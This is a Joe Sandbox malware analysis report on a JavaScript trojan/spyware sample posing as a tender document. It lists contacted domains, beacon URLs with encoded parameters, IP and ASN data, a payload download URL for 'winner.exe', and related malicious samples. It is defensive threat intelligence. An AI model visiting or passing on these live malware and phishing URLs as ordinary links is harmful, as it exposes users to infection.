          http://www.versusfinances.tech/czni/?20=4xfPiv3RnE&z8rul-n=jZ3aVVsOPCQ8zDolwfPMJ0FgyASOdlT+pUUZWGluxzeJivrfCzX4+7jeTlPikh1G7PP+5G6V9EQpGQT3uHsK4bLie7FdC0b4pw==0%Avira URL Cloudsafe
          http://www.dellaone.com0%Avira URL Cloudsafe
          http://www.genuineinsights.cloud/czni/100%Avira URL Cloudmalware
          http://www.versusfinances.tech/czni/0%Avira URL Cloudsafe
          http://www.deglaz.xyz0%Avira URL Cloudsafe
          http://www.hougou.ru/czni/ev0%Avira URL Cloudsafe
          http://www.versusfinances.tech0%Avira URL Cloudsafe
          http://www.44yyds.com/czni/100%Avira URL Cloudmalware
          http://www.yeah-go.com/czni/100%Avira URL Cloudmalware
          http://www.octohoki.net0%Avira URL Cloudsafe
          http://www.toporsche.online/czni/?z8rul-n=E4OQobxTIZHI9DwF67UlwwaqlZHGKxy7UPoiurSE2O3aUzyIC/5i48ZUEimfrB3iPtHclG/TUXxg+aW3JsqIZG+/wkw9ZppI6Q==&20=4xfPiv3RnE0%Avira URL Cloudsafe
          http://www.octohoki.net/czni/?20=4xfPiv3RnE&z8rul-n=4iC+VHkN7UzSdUovnFh7HjvkVuvE2o78vWsfJQRZ88kc+lrgrCCJnpqL68g1VIZYfy6U/dRc4iar4OlCjHSLY4rOm4VqYu/FMA==0%Avira URL Cloudsafe
          http://www.toporsche.online0%Avira URL Cloudsafe
          http://www.panalobet88.net0%Avira URL Cloudsafe
          http://www.arritalvigo.com/czni/?z8rul-n=7CuzI5hL2DbaheDUreUXt/0ggIp8KK0y2ydS3GGUn+rOJNFozWHMconX3zZMJG7nrNLowVQEJNRqJBBdS7PrQOxc+aMUIwOUOQ==&20=4xfPiv3RnE0%Avira URL Cloudsafe
          http://www.frogair.online100%Avira URL Cloudmalware
          http://www.deglaz.xyzwww.deglaz.xyz20=4xfPiv3RnEaY0%Avira URL Cloudsafe
          http://www.frogair.online/czni/100%Avira URL Cloudmalware
          http://www.arritalvigo.com0%Avira URL Cloudsafe
          http://www.yeah-go.comwww.yeah-go.com20=4xfPiv3RnE0%Avira URL Cloudsafe
          http://www.panalobet88.net/czni/0%Avira URL Cloudsafe
          http://www.laylaroseuk.com/czni/100%Avira URL Cloudmalware
          http://www.toporsche.online/czni/0%Avira URL Cloudsafe
          http://www.toporsche.onlinewww.toporsche.online20=4xfPiv3RnE0%Avira URL Cloudsafe
          http://www.dellaone.com/czni/0%Avira URL Cloudsafe
          http://www.deglaz.xyz/czni/?z8rul-n=y4naTkG6lumfG07sOssNMJlhuzOAznpWNSZYkPg2bq4ikF6oslohHoKN6Rf87KyLhWahQVt7sEYulG9jlpJKSoDlIP2gQN5V1A==&20=4xfPiv3RnE0%Avira URL Cloudsafe
          http://www.44yyds.com0%Avira URL Cloudsafe
          https://hirosguide.hu/ti/winner.exe100%Avira URL Cloudmalware
          http://www.hayethe.site/czni/0%Avira URL Cloudsafe
          http://www.genuineinsights.cloudwww.genuineinsights.cloud20=4xfPiv3RnE0%Avira URL Cloudsafe
          http://www.lakeviewautomation.com/czni/0%Avira URL Cloudsafe
          http://www.octohoki.net/czni/0%Avira URL Cloudsafe
          http://www.laylaroseuk.com/czni/?20=4xfPiv3RnE&z8rul-n=CEJ5RAslKFrvYswGKkWFaMEg5PbGdI0uMfwhN2QDDZMYEZrXiZBgo1mjS41e+07AKrnAHTFcuEyQDmPBY1Lnrpc7hFsEfyPzNg==100%Avira URL Cloudmalware
          http://www.genuineinsights.cloud100%Avira URL Cloudphishing
          http://www.lakeviewautomation.com0%Avira URL Cloudsafe
          http://www.arritalvigo.com/czni/0%Avira URL Cloudsafe
          http://www.hougou.ru/czni/?z8rul-n=MumrQfrFlOyD9XsP8OR0UClXFyftPmtzTeYgycr6a5IUfga2ox/HNpA7pnpLcbk4ltNykJNVaPuH0Ad8Q8mslGHvUdw/9wroMg==&20=4xfPiv3RnE0%Avira URL Cloudsafe
          http://www.yeah-go.com/czni/?z8rul-n=NBbLbMKCnleo0bnLNJr7y57f08wHeLbsflpVfs6UmX5SvZLxN88Gw8EeREzrIsvGXit/2Ohq43fDpUBAiFCfWP8z8U1D0vMs/Q==&20=4xfPiv3RnE100%Avira URL Cloudmalware
          http://www.hayethe.sitewww.hayethe.site20=4xfPiv3RnE0%Avira URL Cloudsafe
          http://www.chimid.org0%Avira URL Cloudsafe
          http://www.yeah-go.com0%Avira URL Cloudsafe
          http://www.44yyds.com/czni/?20=4xfPiv3RnE&z8rul-n=DD3LLnJbgjRI3wbnkxRSCI8A3gaHykSHoexTe78K7+O1bJpnCKZS4RFcfu7PoQdaWmtTlOOE5dVeManAz6l5Ezu0dt1GwRw+Ew==100%Avira URL Cloudmalware
          http://www.frogair.online/czni/?20=4xfPiv3RnE&z8rul-n=5oRHUQDtYJ3jH+KiyYuXif0R6NF655imjfvnRa6lV5c+zSwVFD4ch3jkTam3ow4RLLhVoDNP5tCGnm9XMNb3kyjT9rM2PcJgOg==100%Avira URL Cloudmalware
          http://www.hayethe.site0%Avira URL Cloudsafe
          http://www.hayethe.site/czni/?z8rul-n=XafM9ufeulvUyazB3PczebMntNGhHBxQYaw7zhnKr1/uYxmt3ImqmxlzRjnKksyV1dU+VPei5c3Iajrs/dC16sOcVh74K2vF1w==&20=4xfPiv3RnE0%Avira URL Cloudsafe
          http://www.hougou.ru/czni/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.genuineinsights.cloud
          		66.96.162.149
          		truetrue
            		unknown
            lakeviewautomation.com
            		142.44.131.177
            		truetrue
              		unknown
              www.arritalvigo.com
              		217.160.0.94
              		truetrue
                		unknown
                www.hougou.ru
                		87.236.16.153
                		truetrue
                  		unknown
                  www.hayethe.site
                  		185.104.28.238
                  		truetrue
                    		unknown
                    44yyds.com
                    		137.59.148.248
                    		truetrue
                      		unknown
                      dellaone.com
                      		64.34.68.10
                      		truetrue
                        		unknown
                        www.octohoki.net
                        		172.67.179.191
                        		truetrue
                          		unknown
                          hirosguide.hu
                          		91.227.138.48
                          		truetrue
                            		unknown
                            www.deglaz.xyz
                            		199.192.28.121
                            		truetrue
                              		unknown
                              shops.myshopify.com
                              		23.227.38.74
                              		truetrue
                                		unknown
                                frogair.online
                                		81.169.145.72
                                		truetrue
                                  		unknown
                                  www.versusfinances.tech
                                  		67.215.9.138
                                  		truetrue
                                    		unknown
                                    www.toporsche.online
                                    		194.58.112.174
                                    		truetrue
                                      		unknown
                                      laylaroseuk.com
                                      		2.57.90.16
                                      		truetrue
                                        		unknown
                                        www.chimid.org
                                        		208.91.197.91
                                        		truetrue
                                          		unknown
                                          panalobet88.net
                                          		14.128.47.126
                                          		truetrue
                                            		unknown
                                            www.frogair.online
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.yeah-go.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.lakeviewautomation.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.laylaroseuk.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.44yyds.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.dellaone.com
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.panalobet88.net
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.deglaz.xyz/czni/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.versusfinances.tech/czni/?20=4xfPiv3RnE&z8rul-n=jZ3aVVsOPCQ8zDolwfPMJ0FgyASOdlT+pUUZWGluxzeJivrfCzX4+7jeTlPikh1G7PP+5G6V9EQpGQT3uHsK4bLie7FdC0b4pw==true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.chimid.org/czni/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.panalobet88.net/czni/?20=4xfPiv3RnE&z8rul-n=fBMxo69x1QXNWuc9hyM7d4IFsS8MYdi4DQWD1kEEyFhAPfH6LtWDKNH9q/ewbXUtBA348B3g5uC8JLGqihwz/XjbfKo4x0QdAA==true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.genuineinsights.cloud/czni/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.44yyds.com/czni/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.versusfinances.tech/czni/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.yeah-go.com/czni/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.arritalvigo.com/czni/?z8rul-n=7CuzI5hL2DbaheDUreUXt/0ggIp8KK0y2ydS3GGUn+rOJNFozWHMconX3zZMJG7nrNLowVQEJNRqJBBdS7PrQOxc+aMUIwOUOQ==&20=4xfPiv3RnEtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.toporsche.online/czni/?z8rul-n=E4OQobxTIZHI9DwF67UlwwaqlZHGKxy7UPoiurSE2O3aUzyIC/5i48ZUEimfrB3iPtHclG/TUXxg+aW3JsqIZG+/wkw9ZppI6Q==&20=4xfPiv3RnEtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.octohoki.net/czni/?20=4xfPiv3RnE&z8rul-n=4iC+VHkN7UzSdUovnFh7HjvkVuvE2o78vWsfJQRZ88kc+lrgrCCJnpqL68g1VIZYfy6U/dRc4iar4OlCjHSLY4rOm4VqYu/FMA==true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.frogair.online/czni/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.laylaroseuk.com/czni/true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://hirosguide.hu/ti/winner.exetrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.dellaone.com/czni/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.toporsche.online/czni/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.deglaz.xyz/czni/?z8rul-n=y4naTkG6lumfG07sOssNMJlhuzOAznpWNSZYkPg2bq4ikF6oslohHoKN6Rf87KyLhWahQVt7sEYulG9jlpJKSoDlIP2gQN5V1A==&20=4xfPiv3RnEtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.hougou.ru/czni/?z8rul-n=MumrQfrFlOyD9XsP8OR0UClXFyftPmtzTeYgycr6a5IUfga2ox/HNpA7pnpLcbk4ltNykJNVaPuH0Ad8Q8mslGHvUdw/9wroMg==&20=4xfPiv3RnEtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.hayethe.site/czni/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.lakeviewautomation.com/czni/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.arritalvigo.com/czni/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.octohoki.net/czni/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.laylaroseuk.com/czni/?20=4xfPiv3RnE&z8rul-n=CEJ5RAslKFrvYswGKkWFaMEg5PbGdI0uMfwhN2QDDZMYEZrXiZBgo1mjS41e+07AKrnAHTFcuEyQDmPBY1Lnrpc7hFsEfyPzNg==true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.yeah-go.com/czni/?z8rul-n=NBbLbMKCnleo0bnLNJr7y57f08wHeLbsflpVfs6UmX5SvZLxN88Gw8EeREzrIsvGXit/2Ohq43fDpUBAiFCfWP8z8U1D0vMs/Q==&20=4xfPiv3RnEtrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.frogair.online/czni/?20=4xfPiv3RnE&z8rul-n=5oRHUQDtYJ3jH+KiyYuXif0R6NF655imjfvnRa6lV5c+zSwVFD4ch3jkTam3ow4RLLhVoDNP5tCGnm9XMNb3kyjT9rM2PcJgOg==true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.44yyds.com/czni/?20=4xfPiv3RnE&z8rul-n=DD3LLnJbgjRI3wbnkxRSCI8A3gaHykSHoexTe78K7+O1bJpnCKZS4RFcfu7PoQdaWmtTlOOE5dVeManAz6l5Ezu0dt1GwRw+Ew==true
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.hayethe.site/czni/?z8rul-n=XafM9ufeulvUyazB3PczebMntNGhHBxQYaw7zhnKr1/uYxmt3ImqmxlzRjnKksyV1dU+VPei5c3Iajrs/dC16sOcVh74K2vF1w==&20=4xfPiv3RnEtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.hougou.ru/czni/true
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          http://www.frogair.onlineexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.lakeviewautomation.comwww.lakeviewautomation.com20=4xfPiv3RnEexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		low
                                                          http://www.arritalvigo.comwww.arritalvigo.com20=4xfPiv3RnEexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		low
                                                          http://www.hougou.ruexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.laylaroseuk.comexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://www.hougou.ruwww.hougou.ru20=4xfPiv3RnEexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		low
                                                          http://www.dellaone.comexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.octohoki.netexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.hougou.ru/czni/evexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.versusfinances.techexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.deglaz.xyzexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.toporsche.onlineexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.panalobet88.netexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.yeah-go.comwww.yeah-go.com20=4xfPiv3RnEexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		low
                                                          http://www.deglaz.xyzwww.deglaz.xyz20=4xfPiv3RnEaYexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		low
                                                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.417335340.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.827550131.0000000000921000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.arritalvigo.comexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.panalobet88.net/czni/explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.44yyds.comexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.toporsche.onlinewww.toporsche.online20=4xfPiv3RnEexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		low
                                                            http://www.lakeviewautomation.comexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.genuineinsights.cloudexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: phishing
                                                            		unknown
                                                            http://www.genuineinsights.cloudwww.genuineinsights.cloud20=4xfPiv3RnEexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		low
                                                            http://www.hayethe.sitewww.hayethe.site20=4xfPiv3RnEexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		low
                                                            http://www.chimid.orgexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.yeah-go.comexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.hayethe.siteexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            142.44.131.177
                                                            		lakeviewautomation.comCanada
                                                            		16276OVHFRtrue
                                                            137.59.148.248
                                                            		44yyds.comIndia
                                                            		394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                            64.34.68.10
                                                            		dellaone.comCanada
                                                            		13768COGECO-PEER1CAtrue
                                                            91.227.138.48
                                                            		hirosguide.huHungary
                                                            		20845DIGICABLEHUtrue
                                                            23.227.38.74
                                                            		shops.myshopify.comCanada
                                                            		13335CLOUDFLARENETUStrue
                                                            14.128.47.126
                                                            		panalobet88.netSingapore
                                                            		64050BCPL-SGBGPNETGlobalASNSGtrue
                                                            199.192.28.121
                                                            		www.deglaz.xyzUnited States
                                                            		22612NAMECHEAP-NETUStrue
                                                            217.160.0.94
                                                            		www.arritalvigo.comGermany
                                                            		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                            185.104.28.238
                                                            		www.hayethe.siteNetherlands
                                                            		206281AS-ZXCSNLtrue
                                                            81.169.145.72
                                                            		frogair.onlineGermany
                                                            		6724STRATOSTRATOAGDEtrue
                                                            66.96.162.149
                                                            		www.genuineinsights.cloudUnited States
                                                            		29873BIZLAND-SDUStrue
                                                            172.67.179.191
                                                            		www.octohoki.netUnited States
                                                            		13335CLOUDFLARENETUStrue
                                                            208.91.197.91
                                                            		www.chimid.orgVirgin Islands (BRITISH)
                                                            		40034CONFLUENCE-NETWORK-INCVGtrue
                                                            67.215.9.138
                                                            		www.versusfinances.techCanada
                                                            		36666GTCOMMCAtrue
                                                            194.58.112.174
                                                            		www.toporsche.onlineRussian Federation
                                                            		197695AS-REGRUtrue
                                                            2.57.90.16
                                                            		laylaroseuk.comLithuania
                                                            		47583AS-HOSTINGERLTtrue
                                                            87.236.16.153
                                                            		www.hougou.ruRussian Federation
                                                            		198610BEGET-ASRUtrue

                                                            Private

                                                            IP
                                                            192.168.2.1

                                                            General Information

                                                            Joe Sandbox Version:36.0.0 Rainbow Opal
                                                            Analysis ID:794330
                                                            Start date and time:2023-01-30 13:37:31 +01:00
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 12m 56s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                            Number of analysed new started processes analysed:7
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:1
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • GSI enabled (Javascript)
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample file name:0900664 MOHS Tender..js
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winJS@11/4@17/18
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HDC Information:
                                                            • Successful, ratio: 44.6% (good quality ratio 37.7%)
                                                            • Quality average: 65.8%
                                                            • Quality standard deviation: 35.9%
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 63
                                                            • Number of non-executed functions: 19
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .js
                                                            • Override analysis time to 240s for JS/VBS files not yet terminated

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            13:39:19API Interceptor1x Sleep call for process: winner.exe modified
                                                            13:39:47API Interceptor1072x Sleep call for process: explorer.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            137.59.148.248PO #U201c011437824.exeGet hashmaliciousBrowse
                                                            • www.44yyds.com/ai0o/?uceQ=WQavPaPKaEXqcIAjdeJGhQBPkHFfinhpEiUefa9c2RTUGgmdM8goZZO4O+fO5SuPIlKIx28kicOMxoHOLfVfMw9NMT3rtuqURA==&CCjVG=uscOzgXpKy
                                                            64.34.68.10#15062022 P.O.exeGet hashmaliciousBrowse
                                                              generated check 662732.xlsmGet hashmaliciousBrowse
                                                                91.227.138.48PAYMENTN.EXE.exeGet hashmaliciousBrowse
                                                                  PaymentNotification.pdf.exeGet hashmaliciousBrowse
                                                                    INVOICE 1284 - DO 1494 - PO073400-1.jsGet hashmaliciousBrowse
                                                                      bank details.jsGet hashmaliciousBrowse

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        www.hougou.ruPO #U201c011437824.exeGet hashmaliciousBrowse
                                                                        • 87.236.16.153
                                                                        hirosguide.huPAYMENTN.EXE.exeGet hashmaliciousBrowse
                                                                        • 91.227.138.48
                                                                        PaymentNotification.pdf.exeGet hashmaliciousBrowse
                                                                        • 91.227.138.48
                                                                        INVOICE 1284 - DO 1494 - PO073400-1.jsGet hashmaliciousBrowse
                                                                        • 91.227.138.48
                                                                        bank details.jsGet hashmaliciousBrowse
                                                                        • 91.227.138.48

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        OVHFRfile.exeGet hashmaliciousBrowse
                                                                        • 5.135.247.111
                                                                        file.exeGet hashmaliciousBrowse
                                                                        • 5.135.247.111
                                                                        987643G.jarGet hashmaliciousBrowse
                                                                        • 51.81.194.202
                                                                        file.exeGet hashmaliciousBrowse
                                                                        • 51.68.190.80
                                                                        file.exeGet hashmaliciousBrowse
                                                                        • 5.135.247.111
